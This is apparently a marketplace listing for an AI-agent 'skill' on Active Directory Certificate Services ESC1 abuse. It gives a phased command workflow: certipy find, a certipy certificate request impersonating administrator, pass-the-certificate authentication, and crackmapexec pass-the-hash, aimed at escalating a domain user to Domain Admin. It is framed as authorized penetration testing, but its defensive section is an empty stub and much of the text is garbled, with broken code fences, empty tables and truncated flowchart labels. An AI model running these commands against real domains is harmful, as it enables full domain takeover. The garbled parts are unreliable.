AgentStack
SKILL verified MIT Self-run

Ad Cs Esc1 Abuse

skill-shulkwisec-bb-huge-ad-cs-esc1-abuse · by ShulkwiSEC

>

No reviews yet
0 installs
13 views
0.0% view→install

Install

$ agentstack add skill-shulkwisec-bb-huge-ad-cs-esc1-abuse

✓ scanned · ✓ verified — works with Claude Code, Cursor, and more.

Security review

✓ Passed

No issues found. Passed automated security review. · v0.1.0 How review works →

  • Prompt-injection patterns
  • Secret / credential exfiltration
  • Dangerous shell & filesystem operations
  • Untrusted network calls
  • Known-malicious package signatures

What it can access

  • Network access No
  • Filesystem access No
  • Shell / process execution No
  • Environment & secrets No
  • Dynamic code execution No

From automated source analysis of v0.1.0. “Used” means the capability is present in the source — more access means more to trust, not that it’s unsafe.

Are you the author of Ad Cs Esc1 Abuse? Claim this listing to set pricing, connect Stripe payouts, and keep 70% of every sale.
Sign up to claim

About

AD CS Abuse - ESC1 (Subject Alternative Name)

When to Use

  • When operating in a Windows Active Directory environment and you discover that Active Directory Certificate Services (AD CS) is deployed (PKI infrastructure).
  • To massively escalate privileges from a standard domain user to Domain Admin by exploiting misconfigured certificate templates.

Prerequisites

  • Authorized scope and rules of engagement for the target environment
  • Appropriate tools installed on the attack/analysis platform
  • Understanding of the target technology stack and architecture
  • Documentation template ready for findings and evidence capture

Workflow

Phase 1: Identifying AD CS and Vulnerable Templates (ESC1)

# Concept: ESC1 ```

```bash
# certipy find -u user@domain.local -p Password123! -dc-ip 10.10.10.10 -vulnerable

Phase 2: Requesting the Certificate

# Concept: With a vulnerable template certipy req -u user@domain.local -p Password123! -dc-ip 10.10.10.10 -ca CA-NAME -template VulnerableTemplate -upn administrator@domain.local

Phase 3: Authenticating with the Certificate (Pass-the-Certificate)

# Concept: certipy auth -pfx administrator.pfx -dc-ip 10.10.10.10 -domain domain.local

Phase 4: Validating Access

# crackmapexec smb 10.10.10.10 -u administrator -H [NTLM_HASH_OBTAINED_FROM_CERTIPY]
Decision Point 🔀
flowchart TD
    A[Find Template ] --> B{ESC1 Vulnerable ]}
    B -->|Yes| C[Request ]
    B -->|No| D[Check ]
    C --> E[Auth ]

🔵 Blue Team Detection & Defense

  • Audit Templates: Monitor Event Logs: Key Concepts

| Concept | Description | |---------|-------------|

Output Format

Ad Cs Esc1 Abuse — Assessment Report
============================================================
Target: [Target identifier]
Assessor: [Operator name]
Date: [Assessment date]
Scope: [Authorized scope]
MITRE ATT&CK: [Relevant technique IDs]

Findings Summary:
  [Finding 1]: [Severity] — [Brief description]
  [Finding 2]: [Severity] — [Brief description]

Detailed Results:
  Phase 1: [Phase name]
    - Result: [Outcome]
    - Evidence: [Screenshot/log reference]
    - Impact: [Business impact assessment]

  Phase 2: [Phase name]
    - Result: [Outcome]
    - Evidence: [Screenshot/log reference]
    - Impact: [Business impact assessment]

Risk Rating: [Critical/High/Medium/Low/Informational]
Recommendations:
  1. [Immediate remediation step]
  2. [Long-term hardening measure]
  3. [Monitoring/detection improvement]

📚 Shared Resources

> For cross-cutting methodology applicable to all vulnerability classes, see: > - [_shared/references/elite-chaining-strategy.md](../shared/references/elite-chaining-strategy.md) — Exploit chaining methodology and high-payout chain patterns > - [_shared/references/elite-report-writing.md](../shared/references/elite-report-writing.md) — HackerOne-optimized report writing, CWE quick reference > - [_shared/references/real-world-bounties.md](../_shared/references/real-world-bounties.md) — Verified disclosed bounties by vulnerability class

References

Source & license

This open-source skill is cataloged on AgentStack and links to its original source — we do not rehost the code.

Install and usage instructions live in the source repository linked above.

Reviews

No reviews yet — be the first.

Versions

  • v0.1.0 Imported from the upstream source.